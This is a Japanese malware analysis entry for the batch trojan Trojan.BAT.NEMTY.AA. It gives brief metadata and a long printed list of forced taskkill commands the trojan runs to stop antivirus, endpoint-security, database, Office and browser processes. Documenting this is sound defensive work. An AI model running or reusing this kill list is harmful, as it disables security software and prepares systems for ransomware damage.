Trojan.BAT.NEMTY.AA

2020年6月30日

解析者: Jay Bradley Nebre

プラットフォーム:

Windows

危険度:

ダメージ度:

感染力:

感染確認数:

システムへの影響:

情報漏えい:

マルウェアタイプ: トロイの木馬型
破壊活動の有無: なし
暗号化:
感染報告の有無: はい

概要

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

詳細

ファイルサイズ 48,168 bytes

タイプ BAT

メモリ常駐なし

発見日 2020年6月19日

侵入方法

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

インストール

マルウェアは、以下のプロセスを追加します。

taskkill /im gcasserv.exe /f
taskkill /im sdtrayapp.exe /f
taskkill /im pcscan.exe /f
taskkill /im mfemms.exe /f
taskkill /im wordpad.exe /f
taskkill /im fcsms.exe /f
taskkill /im frameworkservic.exe /f
taskkill /im mcsysmon.exe /f
taskkill /im swi_service.exe /f
taskkill /im ocssd.exe /f
taskkill /im prwriter.exe /f
taskkill /im onlnsvc.exe /f
taskkill /im aswupdsv.exe /f
taskkill /im cavscan.exe /f
taskkill /im fspc.exe /f
taskkill /im nerosvc.exe /f
taskkill /im pcclient.exe /f
taskkill /im googlecrashhandler64.exe /f
taskkill /im kpfw32.exe /f
taskkill /im aflogvw.exe /f
taskkill /im cavrep.exe /f
taskkill /im atrshost.exe /f
taskkill /im msscli.exe /f
taskkill /im checkup.exe /f
taskkill /im qclean.exe /f
taskkill /im clps.exe /f
taskkill /im up2date.exe /f
taskkill /im snhwsrv.exe /f
taskkill /im mcsacore.exe /f
taskkill /im msssrv.exe /f
taskkill /im thunderbird.exe /f
taskkill /im saservice.exe /f
taskkill /im mbamtray.exe /f
taskkill /im ravupdate.exe /f
taskkill /im updaterui.exe /f
taskkill /im nrmenctb.exe /f
taskkill /im alert.exe /f
taskkill /im evtarmgr.exe /f
taskkill /im snicheckadm.exe /f
taskkill /im npfmsg.exe /f
taskkill /im mfewch.exe /f
taskkill /im dwhwizrd.exe /f
taskkill /im bdsubmit.exe /f
taskkill /im oracle.exe /f
taskkill /im outpost.exe /f
taskkill /im caavguiscan.exe /f
taskkill /im giantantispywareupdater.exe /f
taskkill /im remupd.exe /f
taskkill /im smsetask.exe /f
taskkill /im scan32.exe /f
taskkill /im prlicensemgr.exe /f
taskkill /im sidebar.exe /f
taskkill /im op_viewer.exe /f
taskkill /im csrss_tc.exe /f
taskkill /im npfsvice.exe /f
taskkill /im fsdfwd.exe /f
taskkill /im psanhost.exe /f
taskkill /im cfftplugin.exe /f
taskkill /im svcharge.exe /f
taskkill /im drwebcgp.exe /f
taskkill /im premailengine.exe /f
taskkill /im musnotificationux.exe /f
taskkill /im svcgenerichost /f
taskkill /im sbamsvc.exe /f
taskkill /im printdevice.exe /f
taskkill /im coreserviceshell.exe /f
taskkill /im vpc32.exe /f
taskkill /im cdm.exe /f
taskkill /im netsession_win.exe /f
taskkill /im diskmon.exe /f
taskkill /im fch32.exe /f
taskkill /im kvxp.kxp /f
taskkill /im snichecksrv.exe /f
taskkill /im rsnetsvr.exe /f
taskkill /im mcepocfg.exe /f
taskkill /im cistray.exe /f
taskkill /im pagent.exe /f
taskkill /im esecservice.exe /f
taskkill /im sysdoc32.exe /f
taskkill /im cmgrdian.exe /f
taskkill /im kpfwsvc.exe /f
taskkill /im ewidoctrl.exe /f
taskkill /im ccenter.exe /f
taskkill /im seestat.exe /f
taskkill /im certificationmanagerservicent.exe /f
taskkill /im trupd.exe /f
taskkill /im kvolself.exe /f
taskkill /im ssscheduler.exe /f
taskkill /im zapro.exe /f
taskkill /im v3medic.exe /f
taskkill /im powerpnt.exe /f
taskkill /im gcascleaner.exe /f
taskkill /im ocautoupds.exe /f
taskkill /im drweb32w.exe /f
taskkill /im ccschedulersvc.exe /f
taskkill /im mskdetct.exe /f
taskkill /im firetray.exe /f
taskkill /im pctssvc.exe /f
taskkill /im winvnc4.exe /f
taskkill /im avconsol.exe /f
taskkill /im dsmcsvc.exe /f
taskkill /im vgauthservice.exe /f
taskkill /im ssecuritymanager.exe /f
taskkill /im mysqld-nt.exe /f
taskkill /im vprosvc.exe /f
taskkill /im ccsystemreport.exe /f
taskkill /im msftesql.exe /f
taskkill /im ssp.exe /f
taskkill /im neotrace.exe /f
taskkill /im dbserv.exe /f
taskkill /im googlecrashhandler.exe /f
taskkill /im acaas.exe /f
taskkill /im tscutynt.exe /f
taskkill /im pntiomon.exe /f
taskkill /im caav.exe /f
taskkill /im dao_log.exe /f
taskkill /im kmailmon.exe /f
taskkill /im semsvc.exe /f
taskkill /im ucservice.exe /f
taskkill /im regmech.exe /f
taskkill /im kswebshield.exe /f
taskkill /im dsmcad.exe /f
taskkill /im avcenter.exe /f
taskkill /im log_qtine.exe /f
taskkill /im rnav.exe /f
taskkill /im avfwsvc.exe /f
taskkill /im setloadorder.exe /f
taskkill /im thebat.exe /f
taskkill /im securitymanager.exe /f
taskkill /im csradius.exe /f
taskkill /im ccprovsp.exe /f
taskkill /im mspmspsv.exe /f
taskkill /im ghosttray.exe /f
taskkill /im pcsws.exe /f
taskkill /im winroute.exe /f
taskkill /im mpfsrv.exe /f
taskkill /im drwebscd.exe /f
taskkill /im avscc.exe /f
taskkill /im frzstate2k.exe /f
taskkill /im fssm32.exe /f
taskkill /im vsstat.exe /f
taskkill /im etagent.exe /f
taskkill /im mcregwiz.exe /f
taskkill /im era.exe /f
taskkill /im vmacthlp.exe /f
taskkill /im mctray.exe /f
taskkill /im sqbcoreservice.exe /f
taskkill /im visio.exe /f
taskkill /im collwrap.exe /f
taskkill /im okclient.exe /f
taskkill /im wfxsnt40.exe /f
taskkill /im mcmscsvc.exe /f
taskkill /im adminserver.exe /f
taskkill /im winword.exe /f
taskkill /im urllstck.exe /f
taskkill /im dlservice.exe /f
taskkill /im vpatch.exe /f
taskkill /im tiaspn~1.exe /f
taskkill /im tfgui.exe /f
taskkill /im server_eventlog.exe /f
taskkill /im ccnfagent.exe /f
taskkill /im tnbutil.exe /f
taskkill /im sqlwriter.exe /f
taskkill /im persfw.exe /f
taskkill /im thebat64.exe /f
taskkill /im updtnv28.exe /f
taskkill /im seccenter.exe /f
taskkill /im bavtray.exe /f
taskkill /im blackice.exe /f
taskkill /im savfmselog.exe /f
taskkill /im cylanceui.exe /f
taskkill /im shstat.exe /f
taskkill /im vmwaretray.exe /f
taskkill /im spooler.exe /f
taskkill /im tbirdconfig.exe /f
taskkill /im preventmgr.exe /f
taskkill /im ngserver.exe /f
taskkill /im erlsrv.exe /f
taskkill /im avktray.exe /f
taskkill /im qoeloader.exe /f
taskkill /im mydesktopqos.exe /f
taskkill /im wfxctl32.exe /f
taskkill /im mfeesp.exe /f
taskkill /im mcshell.exe /f
taskkill /im blackd.exe /f
taskkill /im ashenhcd.exe /f
taskkill /im pavbckpt.exe /f
taskkill /im loggingserver.exe /f
taskkill /im vmtoolsd.exe /f
taskkill /im server_runtime.exe /f
taskkill /im fwcfg.exe /f
taskkill /im mcscript_inuse.exe /f
taskkill /im update_task.exe /f
taskkill /im pccntupd.exe /f
taskkill /im scanexplicit.exe /f
taskkill /im swserver.exe /f
taskkill /im pavupg.exe /f
taskkill /im nissrv.exe /f
taskkill /im fsmb32.exe /f
taskkill /im isafinst.exe /f
taskkill /im zoolz.exe /f
taskkill /im fsaa.exe /f
taskkill /im mcods.exe /f
taskkill /im scanmsg.exe /f
taskkill /im mpfagent.exe /f
taskkill /im tmproxy.exe /f
taskkill /im srvmon.exe /f
taskkill /im vptray.exe /f
taskkill /im tfun.exe /f
taskkill /im aus.exe /f
taskkill /im etloganalyzer.exe /f
taskkill /im lucallbackproxy.exe /f
taskkill /im isqlplussvc.exe /f
taskkill /im mcvsrte.exe /f
taskkill /im webproxy.exe /f
taskkill /im savfmsesrv.exe /f
taskkill /im emlproui.exe /f
taskkill /im pviewer.exe /f
taskkill /im pwdfilthelp.exe /f
taskkill /im vetmsg.exe /f
taskkill /im fcdblog.exe /f
taskkill /im drwupgrade.exe /f
taskkill /im njeeves.exe /f
taskkill /im gziface.exe /f
taskkill /im sevinst.exe /f
taskkill /im alertsvc.exe /f
taskkill /im client64.exe /f
taskkill /im winlog.exe /f
taskkill /im avwebgrd.exe /f
taskkill /im fsguiexe.exe /f
taskkill /im pavfires.exe /f
taskkill /im mpcmdrun.exe /f
taskkill /im lucomserver.exe /f
taskkill /im kvdetech.exe /f
taskkill /im tsatisy.exe /f
taskkill /im pmon.exe /f
taskkill /im nymse.exe /f
taskkill /im mfehcs.exe /f
taskkill /im deteqt.agent.exe /f
taskkill /im control_panel.exe /f
taskkill /im snsrv.exe /f
taskkill /im nisserv.exe /f
taskkill /im cfpupdat.exe /f
taskkill /im aesecurityservice.exe /f
taskkill /im smsesp.exe /f
taskkill /im kvsrvxp.exe /f
taskkill /im acais.exe /f
taskkill /im kissvc.exe /f
taskkill /im mfewc.exe /f
taskkill /im snac.exe /f
taskkill /im drwagnui.exe /f
taskkill /im prevsrv.exe /f
taskkill /im etwcontrolpanel.exe /f
taskkill /im mfetp.exe /f
taskkill /im pccpfw.exe /f
taskkill /im klwtblfs.exe /f
taskkill /im snicon.exe /f
taskkill /im patrolperf.exe /f
taskkill /im ccevtmgr.exe /f
taskkill /im clamwin.exe /f
taskkill /im npfmntor.exe /f
taskkill /im psctrls.exe /f
taskkill /im mscifapp.exe /f
taskkill /im gdfwsvc.exe /f
taskkill /im ras.exe /f
taskkill /im ndrvx.exe /f
taskkill /im psimreal.exe /f
taskkill /im mcupdmgr.exe /f
taskkill /im ntcaagent.exe /f
taskkill /im mantispm.exe /f
taskkill /im excel.exe /f
taskkill /im execstat.exe /f
taskkill /im rapuisvc.exe /f
taskkill /im alupdate.exe /f
taskkill /im engineserver.exe /f
taskkill /im ncdaemon.exe /f
taskkill /im proficypublisherservice.exe /f
taskkill /im fshdll32.exe /f
taskkill /im mrf.exe /f
taskkill /im privacyiconclient.exe /f
taskkill /im pview.exe /f
taskkill /im umxagent.exe /f
taskkill /im comhost.exe /f
taskkill /im bdss.exe /f
taskkill /im savfmsespamstatsmanager.exe /f
taskkill /im masalert.exe /f
taskkill /im pavmail.exe /f
taskkill /im loggetor.exe /f
taskkill /im ccsetmgr.exe /f
taskkill /im v3clnsrv.exe /f
taskkill /im smseui.exe /f
taskkill /im psh_svc.exe /f
taskkill /im msascui.exe /f
taskkill /im nsmdemf.exe /f
taskkill /im nailgpip.exe /f
taskkill /im fih32.exe /f
taskkill /im savscan.exe /f
taskkill /im sweepsrv.sys /f
taskkill /im slee81.exe /f
taskkill /im avltmain.exe /f
taskkill /im srvload.exe /f
taskkill /im cfpconfg.exe /f
taskkill /im pthosttr.exe /f
taskkill /im ntcaservice.exe /f
taskkill /im bdredline.exe /f
taskkill /im wrsa.exe /f
taskkill /im lmon.exe /f
taskkill /im dwrcst.exe /f
taskkill /im rasupd.exe /f
taskkill /im kis.exe /f
taskkill /im bdagent.exe /f
taskkill /im mcsvhost.exe /f
taskkill /im macmnsvc.exe /f
taskkill /im trjscan.exe /f
taskkill /im coreframeworkhost.exe /f
taskkill /im ehttpsrv.exe /f
taskkill /im console.exe /f
taskkill /im cappactiveprotection.exe /f
taskkill /im proficyclient.exe4 /f
taskkill /im zillya.exe /f
taskkill /im proficysts.exe /f
taskkill /im dwnetfilter.exe /f
taskkill /im nd2svc.exe /f
taskkill /im umxfwhlp.exe /f
taskkill /im mcappins.exe /f
taskkill /im clamtray.exe /f
taskkill /im rfwsrv.exe /f
taskkill /im smex_master.exe /f
taskkill /im scanfrm.exe /f
taskkill /im kabackreport.exe /f
taskkill /im rdrcef.exe /f
taskkill /im scfservice.exe /f
taskkill /im pavsrv51.exe /f
taskkill /im fsaua.exe /f
taskkill /im csmon.exe /f
taskkill /im vsserv.exe /f
taskkill /im mcvsshld.exe /f
taskkill /im tpsrv.exe /f
taskkill /im pavsrv50.exe /f
taskkill /im mpsevh.exe /f
taskkill /im almon.exe /f
taskkill /im fcappdb.exe /f
taskkill /im v3main.exe /f
taskkill /im igateway.exe /f
taskkill /im nip.exe /f
taskkill /im bluestripecollector.exe /f
taskkill /im ntrtscan.exe /f
taskkill /im lucoms~1.exe /f
taskkill /im acctmgr.exe /f
taskkill /im amsvc.exe /f
taskkill /im msmpeng.exe /f
taskkill /im uplive.exe /f
taskkill /im tsansrf.exe /f
taskkill /im v2iconsole.exe /f
taskkill /im ssm.exe /f
taskkill /im smoutlookpack.exe /f
taskkill /im etcorrel.exe /f
taskkill /im etrssfeeds.exe /f
taskkill /im avkservice.exe /f
taskkill /im ccflic4.exe /f
taskkill /im fchelper64.exe /f
taskkill /im pavsrv52.exe /f
taskkill /im cslog.exe /f
taskkill /im mysqld-opt.exe /f
taskkill /im pccnt.exe /f
taskkill /im icepack.exe /f
taskkill /im ccupdate.exe /f
taskkill /im ashpopwz.exe /f
taskkill /im vmware-converter.exe /f
taskkill /im nlclient.exe /f
taskkill /im swnetsup.exe /f
taskkill /im fsma32.exe /f
taskkill /im cctray.exe /f
taskkill /im crdm.exe /f
taskkill /im ravstub.exe /f
taskkill /im calogdump.exe /f
taskkill /im ppppwallrun.exe /f
taskkill /im reportingservicesservice.exe /f
taskkill /im ashdisp.exe /f
taskkill /im tftray.exe /f
taskkill /im redirsvc.exe /f
taskkill /im rstray.exe /f
taskkill /im ctdataload.exe /f
taskkill /im endpointsecurity.exe /f
taskkill /im drweb32.exe /f
taskkill /im auth8021x.exe /f
taskkill /im drwinst.exe /f
taskkill /im sndmon.exe /f
taskkill /im pqibrowser.exe /f
taskkill /im mpf.exe /f
taskkill /im capfsem.exe /f
taskkill /im rfwstub.exe /f
taskkill /im pccntmon.exe /f
taskkill /im mcapexe.exe /f
taskkill /im fwinst.exe /f
taskkill /im mcui32.exe /f
taskkill /im prdatabasemgr.exe /f
taskkill /im knupdatemain.exe /f
taskkill /im starta.exe /f
taskkill /im navelog.exe /f
taskkill /im pavkre.exe /f
taskkill /im cfnotsrvd.exe /f
taskkill /im toolbarupdater.exe /f
taskkill /im navectrl.exe /f
taskkill /im rssensor.exe /f
taskkill /im egui.exe /f
taskkill /im pavfnsvr.exe /f
taskkill /im psctris.exe /f
taskkill /im onlinent.exe /f
taskkill /im nisum.exe /f
taskkill /im nslocollectorservice.exe /f
taskkill /im sav32cli.exe /f
taskkill /im hwapi.exe /f
taskkill /im inet_gethost.exe /f
taskkill /im stopp.exe /f
taskkill /im googleupdate.exe /f
taskkill /im csadmin.exe /f
taskkill /im dwarkdaemon.exe /f
taskkill /im tnslsnr.exe /f
taskkill /im webscanx.exe /f
taskkill /im tmlisten.exe /f
taskkill /im mpsvc.exe /f
taskkill /im pcscnsrv.exe /f
taskkill /im mfefire.exe /f
taskkill /im proficy administrator.exe /f
taskkill /im opscan.exe /f
taskkill /im fcssas.exe /f
taskkill /im ahnrpt.exe /f
taskkill /im mfefw.exe /f
taskkill /im inotask.exe /f
taskkill /im cpf.exe /f
taskkill /im uiwatchdog.exe /f
taskkill /im savmain.exe /f
taskkill /im prschedulemgr.exe /f
taskkill /im wssfcmai.exe /f
taskkill /im ntcadaemon.exe /f
taskkill /im savfmsesp.exe /f
taskkill /im pccguide.exe /f
taskkill /im appsvc32.exe /f
taskkill /im prprintserver.exe /f
taskkill /im djsnetcn.exe /f
taskkill /im spiderml.exe /f
taskkill /im mctskshd.exe /f
taskkill /im dr_serviceengine.exe /f
taskkill /im eeyeevnt.exe /f
taskkill /im mcdetect.exe /f
taskkill /im isntsmtp.exe /f
taskkill /im dpmra.exe /f
taskkill /im symlcsvc.exe /f
taskkill /im nsmdsch.exe /f
taskkill /im atwsctsk.exe /f
taskkill /im fprottray.exe /f
taskkill /im avtask.exe /f
taskkill /im kpf4gui.exe /f
taskkill /im scfmanager.exe /f
taskkill /im pccclient.exe /f
taskkill /im bwgo0000 /f
taskkill /im vstskmgr.exe /f
taskkill /im drwebupw.exe /f
taskkill /im webtrapnt.exe /f
taskkill /im fameh32.exe /f
taskkill /im rfwproxy.exe /f
taskkill /im mcconsol.exe /f
taskkill /im doscan.exe /f
taskkill /im gzserv.exe /f
taskkill /im aphost.exe /f
taskkill /im omslogmanager.exe /f
taskkill /im navesp.exe /f
taskkill /im smsesjm.exe /f
taskkill /im infopath.exe /f
taskkill /im blupro.exe /f
taskkill /im rcsvcmon.exe /f
taskkill /im fws.exe /f
taskkill /im mgntsvc.exe /f
taskkill /im cmdagent.exe /f
taskkill /im issvc.exe /f
taskkill /im umxpol.exe /f
taskkill /im stwatchdog.exe /f
taskkill /im itmrt_supportdiagnostics.exe /f
taskkill /im idsinst.exe /f
taskkill /im firefox.exe /f
taskkill /im sesclu.exe /f
taskkill /im deloeminfs.exe /f
taskkill /im mysqld.exe /f
taskkill /im sndsrvc.exe /f
taskkill /im csinsmnt.exe /f
taskkill /im nsmdreal.exe /f
taskkill /im fscuif.exe /f
taskkill /im vrvmon.exe /f
taskkill /im mcvsftsn.exe /f
taskkill /im omniagent.exe /f
taskkill /im ofcpfwsvc.exe /f
taskkill /im npmdagent.exe /f
taskkill /im vsmain.exe /f
taskkill /im ppclean.exe /f
taskkill /im ghost_2.exe /f
taskkill /im nvcsched.exe /f
taskkill /im masvc.exe /f
taskkill /im prrouter.exe /f
taskkill /im upschd.exe /f
taskkill /im svframe.exe /f
taskkill /im avnotify.exe /f
taskkill /im massrv.exe /f
taskkill /im gcasservalert.exe /f
taskkill /im isscsf.exe /f
taskkill /im ca.exe /f
taskkill /im seanalyzertool.exe /f
taskkill /im tmntsrv.exe /f
taskkill /im uiseagnt.exe /f
taskkill /im kislive.exe /f
taskkill /im msksrver.exe /f
taskkill /im qserver.exe /f
taskkill /im mcepoc.exe /f
taskkill /im reportsvc.exe /f
taskkill /im pctsgui.exe /f
taskkill /im netalertclient.exe /f
taskkill /im vpdn_lu.exe /f
taskkill /im steam.exe /f
taskkill /im nimbus.exe /f
taskkill /im nipsvc.exe /f
taskkill /im emlibupdateagentnt.exe /f
taskkill /im fshoster64.exe /f
taskkill /im bmrt.exe /f
taskkill /im ravxp.exe /f
taskkill /im omtsreco.exe /f
taskkill /im issdaemon.exe /f
taskkill /im uploadrecord.exe /f
taskkill /im unvet32.exe /f
taskkill /im mpftray.exe /f
taskkill /im ppmcativedetection.exe /f
taskkill /im inicio.exe /f
taskkill /im fsguidll.exe /f
taskkill /im lwdmserver.exe /f
taskkill /im umxcfg.exe /f
taskkill /im cka.exe /f
taskkill /im patch.exe /f
taskkill /im poproxy.exe /f
taskkill /im avshadow.exe /f
taskkill /im rfwmain.exe /f
taskkill /im navshcom.exe /f
taskkill /im csfalconservice.exe /f
taskkill /im aclntusr.exe /f
taskkill /im ashskpck.exe /f
taskkill /im fmon.exe /f
taskkill /im cfpsbmit.exe /f
taskkill /im euqmonitor.exe /f
taskkill /im ravservice.exe /f
taskkill /im msmdsrv.exe /f
taskkill /im aexnsagent.exe /f
taskkill /im realmon.exe /f
taskkill /im ahnsdsv.exe /f
taskkill /im nvcoas.exe /f
taskkill /im pavreport.exe /f
taskkill /im drwebmng.exe /f
taskkill /im caavcmdscan.exe /f
taskkill /im etscheduler.exe /f
taskkill /im savfmsetask.exe /f
taskkill /im scanwscs.exe /f
taskkill /im acaegmgr.exe /f
taskkill /im dwengine.exe /f
taskkill /im pavsched.exe /f
taskkill /im csauth.exe /f
taskkill /im zonealarm.exe /f
taskkill /im ntservices.exe /f
taskkill /im smsesrv.exe /f
taskkill /im capfasem.exe /f
taskkill /im afwserv.exe /f
taskkill /im spideragent.exe /f
taskkill /im useranalysis.exe /f
taskkill /im cpdclnt.exe /f
taskkill /im rav.exe /f
taskkill /im repmgr64.exe /f
taskkill /im kanmcmain.exe /f
taskkill /im eventparser.exe /f
taskkill /im ashbug.exe /f
taskkill /im padfsvr.exe /f
taskkill /im scftray.exe /f
taskkill /im outlook.exe /f
taskkill /im routernt.exe /f
taskkill /im kb891711.exe /f
taskkill /im vrv.exe /f
taskkill /im nsctop.exe /f
taskkill /im smsectrl.exe /f
taskkill /im etconsole3.exe /f
taskkill /im ashsimp2.exe /f
taskkill /im nlsvc.exe /f
taskkill /im cafw.exe /f
taskkill /im npscheck.exe /f
taskkill /im schupd.exe /f
taskkill /im xfssvccon.exe /f
taskkill /im gdscan.exe /f
taskkill /im cfplogvw.exe /f
taskkill /im ashlogv.exe /f
taskkill /im drwebwin.exe /f
taskkill /im dbsnmp.exe /f
taskkill /im edisk.exe /f
taskkill /im networkagent.exe /f
taskkill /im aps.exe /f
taskkill /im kwatch.exe /f
taskkill /im proutil.exe /f
taskkill /im avmcdlg.exe /f
taskkill /im certificateprovider.exe /f
taskkill /im mcproxy.exe /f
taskkill /im ccsmagtd.exe /f
taskkill /im procexp.exe /f
taskkill /im url_response.exe /f
taskkill /im symsport.exe /f
taskkill /im savfmsectrl.exe /f
taskkill /im luall.exe /f
taskkill /im forcefield.exe /f
taskkill /im ad-aware2007.exe /f
taskkill /im mghtml.exe /f
taskkill /im managementagentnt.exe /f
taskkill /im agntsvc.exe /f
taskkill /im inoweb.exe /f
taskkill /im sschk.exe /f
taskkill /im spidernt.exe /f
taskkill /im dbeng50.exe /f
taskkill /im swnxt.exe /f
taskkill /im nmagent.exe /f
taskkill /im firesvc.exe /f
taskkill /im rulaunch.exe /f
taskkill /im rpcserv.exe /f
taskkill /im pcctlcom.exe /f
taskkill /im prreader.exe /f
taskkill /im wrctrl.exe /f
taskkill /im mcnasvc.exe /f
taskkill /im sgbhp.exe /f
taskkill /im clpsla.exe /f
taskkill /im ashsimpl.exe /f
taskkill /im pshost.exe /f
taskkill /im clshield.exe /f
taskkill /im evtprocessecfile.exe /f
taskkill /im mfevtps.exe /f
taskkill /im caantispyware.exe /f
taskkill /im mbamservice.exe /f
taskkill /im ashchest.exe /f
taskkill /im rscd.exe /f
taskkill /im defwatch /f
taskkill /im kansgui.exe /f
taskkill /im proficyserver.exe /f
taskkill /im avsynmgr.exe /f
taskkill /im ekrn.exe /f
taskkill /im cfsmsmd.exe /f
taskkill /im spyemergency.exe /f
taskkill /im cfpconfig.exe /f
taskkill /im sqlbrowser.exe /f
taskkill /im ashcmd.exe /f
taskkill /im pctsauxs.exe /f
taskkill /im fshoster32.exe /f
taskkill /im defwatch.exe /f
taskkill /im v3sp.exe /f
taskkill /im paamsrv.exe /f
taskkill /im inorpc.exe /f
taskkill /im mfecanary.exe /f
taskkill /im oespamtest.exe /f
taskkill /im gcasdtserv.exe /f
taskkill /im drwebwcl.exe /f
taskkill /im ndetect.exe /f
taskkill /im svdealer.exe /f
taskkill /im teamviewer_service.exe /f
taskkill /im prconfigmgr.exe /f
taskkill /im fpavserver.exe /f
taskkill /im sahookmain.exe /f
taskkill /im smex_remoteconf /f
taskkill /im ravtray.exe /f
taskkill /im psimsvc.exe /f
taskkill /im hdb.exe /f
taskkill /im avscan.exe /f
taskkill /im xcommsvr.exe /f
taskkill /im livesrv.exe /f
taskkill /im casecuritycenter.exe /f
taskkill /im schdsrvc.exe /f
taskkill /im leventmgr.exe /f
taskkill /im paxton.net2.commsserverservice.exe /f
taskkill /im netcfg.exe /f
taskkill /im klswd.exe /f
taskkill /im avesvc.exe /f
taskkill /im dltray.exe /f
taskkill /im healthservice.exe /f
taskkill /im kpf4ss.exe /f
taskkill /im securitycenter.exe /f
taskkill /im caf.exe /f
taskkill /im traflnsp.exe /f
taskkill /im nexe /f
taskkill /im gcasswupdater.exe /f
taskkill /im kansvr.exe /f
taskkill /im pqv2isvc.exe /f
taskkill /im administrator.exe /f
taskkill /im prgateway.exe /f
taskkill /im monsysnt.exe /f
taskkill /im aswserv.exe /f
taskkill /im spbbcsvc.exe /f
taskkill /im cavrid.exe /f
taskkill /im clpsls.exe /f
taskkill /im config_api_service.exe /f
taskkill /im smc.exe /f
taskkill /im kvmonxp_2.kxp /f
taskkill /im ccproxy.exe /f
taskkill /im itmrtsvc.exe /f
taskkill /im bka.exe /f
taskkill /im npssvc.exe /f
taskkill /im stopa.exe /f
taskkill /im emlproxy.exe /f
taskkill /im ravmon.exe /f
taskkill /im sdrservice.exe /f
taskkill /im svcntaux.exe /f
taskkill /im mcuimgr.exe /f
taskkill /im usergate.exe /f
taskkill /im klserver.exe /f
taskkill /im firefoxconfig.exe /f
taskkill /im pop3pack.exe /f
taskkill /im ashupd.exe /f
taskkill /im nsmdmon.exe /f
taskkill /im mpfservice.exe /f
taskkill /im monitoringhost.exe /f
taskkill /im spiderui.exe /f
taskkill /im cntaosmgr.exe /f
taskkill /im avengine.exe /f
taskkill /im prstubber.exe /f
taskkill /im wscntfy.exe /f
taskkill /im savui.exe /f
taskkill /im dbsrv9.exe /f
taskkill /im hpqwmiex.exe /f
taskkill /im monsvcnt.exe /f
taskkill /im knownsvr.exe /f
taskkill /im tbmon.exe /f
taskkill /im prftpengine.exe /f
taskkill /im csdbsync.exe /f
taskkill /im fsm32.exe /f
taskkill /im nimcluster.exe /f
taskkill /im drwebcom.exe /f
taskkill /im ppctlpriv.exe /f
taskkill /im macompatsvc.exe /f
taskkill /im ccap.exe /f
taskkill /im fnplicensingservice.exe /f
taskkill /im mcpalmcfg.exe /f
taskkill /im pctstray.exe /f
taskkill /im keysvc.exe /f
taskkill /im olfsnt40.exe /f
taskkill /im caissdt.exe /f
taskkill /im prcalculationmgr.exe /f
taskkill /im mcshld9x.exe /f
taskkill /im klnacserver.exe /f
taskkill /im lucoms.exe /f
taskkill /im workflowresttest.exe /f
taskkill /im vshwin32.exe /f
taskkill /im apvxdwin.exe /f
taskkill /im ccsvchst.exe /f
taskkill /im useractivity.exe /f
taskkill /im qdcsfs.exe /f
taskkill /im entitymain.exe /f
taskkill /im cclaw.exe /f
taskkill /im xfilter.exe /f
taskkill /im alogserv.exe /f
taskkill /im onenote.exe /f
taskkill /im mcwce.exe /f
taskkill /im bcrservice.exe /f
taskkill /im drwagntd.exe /f
taskkill /im spyemergencysrv.exe /f
taskkill /im mcwcecfg.exe /f
taskkill /im drweb.exe /f
taskkill /im ravmond.exe /f
taskkill /im itmrt_trace.exe /f
taskkill /im mps.exe /f
taskkill /im symtray.exe /f
taskkill /im fsavgui.exe /f
taskkill /im sqlagent.exe /f
taskkill /im prrds.exe /f
taskkill /im aexnsrcvsvc.exe /f
taskkill /im pasystemtray.exe /f
taskkill /im ccflic0.exe /f
taskkill /im udaterui.exe /f
taskkill /im sqlservr.exe /f
taskkill /im rapapp.exe /f
taskkill /im smsx.exe /f
taskkill /im isuac.exe /f
taskkill /im aexsvc.exe /f
taskkill /im mcagent.exe /f
taskkill /im myagttry.exe /f
taskkill /im kwsprod.exe /f
taskkill /im mcupdate.exe /f
taskkill /im setupguimngr.exe /f
taskkill /im aclient.exe /f
taskkill /im pcscm.exe /f
taskkill /im acaif.exe /f
taskkill /im ntevl.exe /f
taskkill /im etreporter.exe /f
taskkill /im stinger.exe /f
taskkill /im ispwdsvc.exe /f
taskkill /im mcmnhdlr.exe /f
taskkill /im sbserv.exe /f
taskkill /im cramtray.exe /f
taskkill /im gcasinstallhelper.exe /f
taskkill /im cwbunnav.exe /f
taskkill /im rtvscan.exe /f
taskkill /im psuaservice.exe /f
taskkill /im ixaptsvc.exe /f
taskkill /im evtmgr.exe /f
taskkill /im isntsysmonitor /f
taskkill /im frameworkservic /f
taskkill /im esecagntservice.exe /f
taskkill /im ashquick.exe /f
taskkill /im swdsvc.exe /f
taskkill /im reportersvc.exe /f
taskkill /im gdfirewalltray.exe /f
taskkill /im savfmsesjm.exe /f
taskkill /im bcreporter.exe /f
taskkill /im traptrackermgr.exe /f
taskkill /im mcshield.exe /f
taskkill /im client.exe /f
taskkill /im aexagentuihost.exe /f
taskkill /im synctime.exe /f
taskkill /im iface.exe /f
taskkill /im avkproxy.exe /f
taskkill /im wfxmod32.exe /f
taskkill /im websensecontrolservice.exe /f
taskkill /im smcgui.exe /f
taskkill /im upfile.exe /f
taskkill /im bhipssvc.exe /f
taskkill /im managementagenthost.exe /f
taskkill /im giantantispywaremain.exe /f
taskkill /im capmuamagt.exe /f
taskkill /im ilicensesvc.exe /f
taskkill /im vmware-converter-a.exe /f
taskkill /im rscdsvc.exe /f
taskkill /im amswmagt /f
taskkill /im hasplmv.exe /f
taskkill /im bdc.exe /f
taskkill /im mcinfo.exe /f
taskkill /im pralarmmgr.exe /f
taskkill /im aswdisp.exe /f
taskkill /im wtusystemsuport.exe /f
taskkill /im mskagent.exe /f
taskkill /im gcasnotice.exe /f
taskkill /im mfemactl.exe /f
taskkill /im krbcc32s.exe /f
taskkill /im a2start.exe /f
taskkill /im kxeserv.exe /f
taskkill /im tmas.exe /f
taskkill /im kaccore.exe /f
taskkill /im pxeservice.exe /f
taskkill /im mpfconsole.exe /f
taskkill /im pxemtftp.exe /f
taskkill /im alsvc.exe /f
taskkill /im scfagent_64.exe /f
taskkill /im aswregsvr.exe /f
taskkill /im symwsc.exe /f
taskkill /im vsmon.exe /f
taskkill /im frameworkservice.exe /f
taskkill /im ndrvs.exe /f
taskkill /im aluschedulersvc.exe /f
taskkill /im mcdash.exe /f
taskkill /im crssvc.exe /f
taskkill /im naprdmgr.exe /f
taskkill /im ccemflsv.exe /f
taskkill /im nisoptui.exe /f
taskkill /im csinject.exe /f
taskkill /im avkwctl.exe /f
taskkill /im oasclnt.exe /f
taskkill /im chrome.exe /f
taskkill /im fsqh.exe /f
taskkill /im fsav32.exe /f
taskkill /im avmailc.exe /f
taskkill /im aexswdusr.exe /f
taskkill /im unsecapp.exe /f
taskkill /im epmd.exe /f
taskkill /im csacontrol.exe /f
taskkill /im ccpxysvc.exe /f
taskkill /im prunsrv.exe /f
taskkill /im asupport.exe /f
